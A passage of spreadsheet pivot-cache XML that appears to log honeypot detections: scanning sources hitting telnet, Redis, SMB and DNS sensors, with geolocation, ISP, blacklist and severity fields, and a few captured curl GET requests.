    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T00:12:15"/>
    <d v="2025-04-03T21:55:43"/>
    <d v="2025-04-04T00:12:15"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="NA"/>
    <s v="45.4643"/>
    <s v="9.18951"/>
    <s v="1267"/>
    <s v="RIPE Network Coordination Centre"/>
    <s v="RIPE Network Coordination Centre"/>
    <s v="business"/>
    <s v="Network and company"/>
    <s v="2011-03-24"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1fbe:a1b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3255"/>
    <x v="3255"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T23:42:48"/>
    <d v="2024-04-16T11:07:43"/>
    <d v="2025-04-03T23:42:48"/>
    <n v="130"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="40022&amp;&amp;23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="KORNET"/>
    <s v="2000-05-26"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3c3:d914"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3256"/>
    <x v="3256"/>
    <s v="122-117-31-176.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T23:41:34"/>
    <d v="2024-09-12T05:38:00"/>
    <d v="2025-04-03T23:41:34"/>
    <n v="228"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;NA&amp;&amp;24998"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:1fb0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3257"/>
    <x v="3257"/>
    <s v="node-13c0.pool-125-24.dynamic.nt-isp.net"/>
    <x v="0"/>
    <d v="2025-04-03T23:34:24"/>
    <d v="2025-04-03T23:34:24"/>
    <d v="2025-04-03T23:34:24"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Khen"/>
    <s v="Bang Khen"/>
    <s v="1619506"/>
    <s v="NA"/>
    <s v="13.8774"/>
    <s v="100.626"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-01-17 03:50:09"/>
    <s v="2026-01-17 03:50:09"/>
    <s v="2025-01-20 03:36:34"/>
    <s v="['NS1.TOTONLINE.NET', 'NS2.TOTONLINE.NET']"/>
    <s v="GMO Internet, Inc."/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:7d18:c720"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3258"/>
    <x v="3258"/>
    <s v="host217-35-71-255.in-addr.btopenworld.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T23:15:39"/>
    <d v="2025-03-21T15:50:07"/>
    <d v="2025-04-03T23:15:39"/>
    <n v="80"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23&amp;&amp;9100&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London (South Bank)"/>
    <s v="2643743"/>
    <s v="SE1"/>
    <s v="51.5037"/>
    <s v="-0.111676"/>
    <s v="2856"/>
    <s v="British Telecommunications PLC"/>
    <s v="BT Public Internet Service"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-03-20 19:04:30"/>
    <s v="2026-03-20 18:04:30"/>
    <s v="2025-03-05 10:08:38"/>
    <s v="['DYDNS0.BT.COM', 'DYDNS1.BT.COM', 'EDDNS0.BT.COM', 'EDDNS1.BT.COM']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:d923:47ff"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3259"/>
    <x v="3259"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T23:08:57"/>
    <d v="2024-12-25T05:13:54"/>
    <d v="2025-04-03T23:08:57"/>
    <n v="458"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-12-08"/>
    <s v="TINP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:834e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3260"/>
    <x v="3260"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T22:54:15"/>
    <d v="2025-04-03T22:54:15"/>
    <d v="2025-04-03T22:54:15"/>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b:8b56"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3261"/>
    <x v="3261"/>
    <s v="147-143.atualtektelecom.com.br"/>
    <x v="0"/>
    <d v="2025-04-03T22:36:17"/>
    <d v="2025-04-03T22:36:17"/>
    <d v="2025-04-03T22:36:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PR"/>
    <s v="Paraná"/>
    <s v="Peabiru"/>
    <s v="Peabiru"/>
    <s v="3454632"/>
    <s v="NA"/>
    <s v="-23.9128"/>
    <s v="-52.3431"/>
    <s v="52560"/>
    <s v="AS52560"/>
    <s v="ATK Telecomunicações Ltda."/>
    <s v="corporate"/>
    <s v="ATK Telecomunicações Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2013-03-21 00:00:00"/>
    <s v="2028-03-21 00:00:00"/>
    <s v="2025-02-11 00:00:00"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="published"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a800:938f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3262"/>
    <x v="3262"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T22:35:34"/>
    <d v="2023-12-04T08:23:00"/>
    <d v="2025-04-03T22:35:34"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="31623&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="KORNET"/>
    <s v="2003-10-27"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:de67:5fc3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3263"/>
    <x v="3263"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T22:23:16"/>
    <d v="2025-04-03T22:23:16"/>
    <d v="2025-04-03T22:23:16"/>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3b62:c4a7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3264"/>
    <x v="3264"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T22:09:20"/>
    <d v="2025-04-03T22:09:20"/>
    <d v="2025-04-03T22:09:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:e578"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3265"/>
    <x v="3265"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T20:59:35"/>
    <d v="2025-02-18T15:51:14"/>
    <d v="2025-04-03T20:59:35"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H38"/>
    <s v="23&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (117.202.139.176,58879)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:8bb0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3266"/>
    <x v="3266"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T20:56:30"/>
    <d v="2025-04-03T12:23:10"/>
    <d v="2025-04-03T20:56:30"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CZ"/>
    <s v="Czechia"/>
    <s v="10"/>
    <s v="Prague"/>
    <s v="Praha 5"/>
    <s v="Ořech (Praha 5)"/>
    <s v="3068899"/>
    <s v="155 00"/>
    <s v="50.0468"/>
    <s v="14.3047"/>
    <s v="16019"/>
    <s v="Vodafone Czech Republic a.s."/>
    <s v="Vodafone Czech Republic"/>
    <s v="residential"/>
    <s v="Vodafone Czech Republic a.s."/>
    <s v="2006-03-16"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:59b1:83f0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3267"/>
    <x v="3267"/>
    <s v="125-231-231-17.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T20:45:48"/>
    <d v="2025-04-03T20:45:48"/>
    <d v="2025-04-03T20:45:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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7de7:e711"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3268"/>
    <x v="3268"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T20:26:47"/>
    <d v="2025-03-13T18:26:04"/>
    <d v="2025-04-03T20:26:47"/>
    <n v="50"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_REDIS_HC1"/>
    <s v="6379"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="KB"/>
    <s v="West Kalimantan"/>
    <s v="Kota Pontianak"/>
    <s v="Pontianak"/>
    <s v="1630789"/>
    <s v="NA"/>
    <s v="-0.026330299999999997"/>
    <s v="109.343"/>
    <s v="38527"/>
    <s v="JAWA POS NATIONAL NETWORK MEDIALINK, PT"/>
    <s v="PT. JAWA POS NATIONAL NETWORK MEDIALINK"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_REDIS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:772f:5802"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3269"/>
    <x v="3269"/>
    <s v="125-228-129-114.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T20:24:12"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T20:24:12"/>
    <n v="312"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H41&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;280&amp;&amp;23&amp;&amp;NA&amp;&amp;80"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de4:8172"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3270"/>
    <x v="3270"/>
    <s v="NA&amp;&amp;host-5-58-13-208.bitternet.ua"/>
    <x v="0"/>
    <d v="2025-04-03T20:24:11"/>
    <d v="2025-03-27T06:03:07"/>
    <d v="2025-04-03T20:24:11"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="61"/>
    <s v="Ternopil"/>
    <s v="Ternopil Raion"/>
    <s v="Ternopil"/>
    <s v="691650"/>
    <s v="NA"/>
    <s v="49.551"/>
